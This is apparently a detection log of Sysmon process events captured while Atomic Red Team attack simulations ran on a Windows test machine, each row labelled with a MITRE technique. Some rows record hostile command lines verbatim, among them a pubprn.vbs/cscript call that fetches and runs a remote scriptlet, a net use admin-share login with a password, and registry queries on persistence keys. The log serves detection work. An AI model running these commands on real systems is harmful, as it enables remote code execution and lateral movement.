SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3616 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:56.040 + 747F3D96-D7A4-5D31-0000-001020C62900 + 4080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3695 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.710 + 747F3D96-D87C-5D31-0000-0010CA5B3100 + 956 + 
C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3693 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.629 + 747F3D96-D87C-5D31-0000-00103F573100 + 2440 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3691 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.541 + 747F3D96-D87C-5D31-0000-0010B4523100 + 4016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3689 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.447 + 747F3D96-D87C-5D31-0000-0010264E3100 + 1428 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3687 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.377 + 747F3D96-D87C-5D31-0000-001097493100 + 1680 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) 
through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3685 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.284 + 747F3D96-D87C-5D31-0000-001009453100 + 5016 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3683 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.212 + 747F3D96-D87C-5D31-0000-00107A403100 + 5984 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3681 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:32.135 + 747F3D96-D87C-5D31-0000-0010E83B3100 + 2888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3680 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 
14:49:31.675 + 747F3D96-D87B-5D31-0000-0010D92D3100 + 3188 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3678 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.532 + 747F3D96-D859-5D31-0000-001045922F00 + 6220 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D859-5D31-0000-0010FB8F2F00 + 888 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3677 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.502 + 747F3D96-D859-5D31-0000-0010FB8F2F00 + 888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3676 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:57.433 + 747F3D96-D859-5D31-0000-0010E68C2F00 + 6524 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3675 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:46.221 + 747F3D96-D84E-5D31-0000-00102C702F00 + 1628 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.103 + 747F3D96-D849-5D31-0000-00103C522F00 + 6068 + C:\Windows\System32\net.exe + 10.0.17763.1 
(WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.103 + 747F3D96-D849-5D31-0000-00103C522F00 + 6068 + C:\Windows\System32\net.exe + 10.0.17763.1 (WinBuild.160101.0800) + Net Command + Microsoft® Windows® Operating System + Microsoft Corporation + net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through 
command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3673 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.068 + 747F3D96-D849-5D31-0000-0010E54F2F00 + 3284 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D849-5D31-0000-0010914D2F00 + 2096 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3672 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:41.034 + 747F3D96-D849-5D31-0000-0010914D2F00 + 2096 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3670 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:37.099 + 747F3D96-D845-5D31-0000-001098212F00 + 2624 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3669 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:36.869 + 747F3D96-D844-5D31-0000-0010C70A2F00 + 2484 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-D844-5D31-0000-001075082F00 + 7140 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cscript.exe /b 